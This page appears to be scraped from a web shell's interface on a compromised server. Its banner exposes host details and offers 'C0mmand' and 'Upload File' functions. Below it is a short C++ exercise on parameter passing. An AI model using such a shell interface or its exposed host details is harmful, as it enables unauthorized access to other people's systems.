Server IP : 172.16.15.8 / Your IP : 3.17.76.174 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/cathomas/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
// Program to illustrate parameter passing // // What is actually displayed on the screen? #include <iostream> using namespace std; void Mayflower (int a, int& b) { int z; z = a - b; a--; b++; } int Pilgrim (int&y, int z) { int x; y++; x = y + z; return x; } int main() { int x = 1, y = 2, z = 3; Mayflower (x,y); cout << x << " " << y << " " << z << "\n"; y = Pilgrim (z,x); cout << x << " " << y << " " << z << "\n"; return 0; }